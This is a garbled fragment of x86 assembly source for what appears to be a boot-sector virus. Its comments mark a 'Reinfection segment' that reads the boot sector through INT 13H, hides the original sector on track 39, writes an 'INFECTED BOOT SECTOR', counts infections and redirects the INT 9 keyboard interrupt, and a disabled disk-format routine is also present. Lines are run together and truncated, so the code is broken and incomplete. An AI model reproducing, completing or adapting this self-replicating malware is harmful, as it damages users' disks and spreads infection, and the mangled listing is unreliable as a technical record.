        MOV  [0017H]INC  Word Ptr [0013H]    ;MEMORY SIZE += 1024 (WERE NOT ACTI
   
                                   PUSH DS              ;IF BIOS F000:E502 == 21
MOV  AX,0F000H
                        ;
R_90                    ;
;-----------------------------------------------------------------------;
; REBOOT INT VECTOR                                                     ;
;-----------------------------------------------------------------------;
NEW_JNZ  N19_20                ...JUMP
N19_10:  PUSH CS             ;ELSE ES=CS
                                    CALL PUT_NEW_09          ;SAVE/REDIRECT INT 
INT                     ;
N19_         
N19_MOV  AH,00               ;RESET DISK
    INT  13             ;JB       N19_81              ;
    MOV  AX,0201             ;READ BOOT SECTOR
    PUSH DS             ;
    POP  ES             ;
    INT  13H            ;
N19_LOOP      2               
    JMP  N19_10               IF RETRY EXPIRED...LOAD BASIC
                                                                                                           
;-----------------------------------------------------------------------;
; Reinfection segment.                                                  ;
;-----------------------------------------------------------------------;
N19_JNZ  RE_INFECT      ;...RE INFECT
                        ;
JMP_                    ;
;-----------------------------------------------------------------------;
; Reinfection Segment.                                                  ;
;-----------------------------------------------------------------------;
RE_INFECT:                   ;
    MOV  CX,00E6H           OURSELF
    CLD                 ;
                               
    REPE CMPSB               ;
    JE   RI_12               ;IF NOT EQUAL...
                        ;
    INC  Word Ptr ES:[COUNTER_1]  ;INC. COUNTER IN OUR CODE (NOT DS!)
                        ;
;MAKMOV  BX,offset TABLE          ;FORMAT INFO
    MOV  AH,5           ;FORMAT
    JMP  RI_10               ;REMOVE THE FORMAT OPTION FOR NOW !
                        ;
; <<< NO EXECUTION PATH TO HERE >>>    ;
                        ;
;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0
RI_1MOV  AX,0301H       ;WRITE 1 SECTOR
                                   IPUSH CS                 (ES=CS FOR PUT_NEW_0
9 BELJB       RI_80               ;IF WRITE ERROR...JUMP TO BOOT CODE
                        ;
         CX,0001             ;WRITE INFECTED BOOT SECTOR !
                        ;
RI_12:   MOV  DI,3456H       ;SET oJUST INFECTED ANOTHER ONE@...
                        ;
RI_80:   CALL PUT_NEW_09          ;SAVE/REDIRECT INT 9 (KEYBOARD)
    DEC  Word Ptr ES:[COUNTER_1]  ;   (DEC. CAUSE DIDNT INFECT)
                        ;
;-----------------------------------------------------------------------;
;                                                                       ;
                                                                                                     3
;-----------------------------------------------------------------------;
N09_MOV  DS,BX               ;
            
;-----------------------------------------------------------------------;
; DELAY                                                                 ;
;                                                                       ;
; ON ENTRY    AH:CX = LOOP COUNT                                        ;
;-----------------------------------------------------------------------;
DELAY    SUB  CX,CX               ;
D_01JNZ  D_01
    RET                 ;
                        ;
                                                                                                     4

;                                                                       ;
;-----------------------------------------------------------------------;
A7DF4         DB   27H,00H,8,2

COUNTER_1     DW   001CH
ALT_CTRL      DW   0
A7DFC         DB   27H,0,8,2


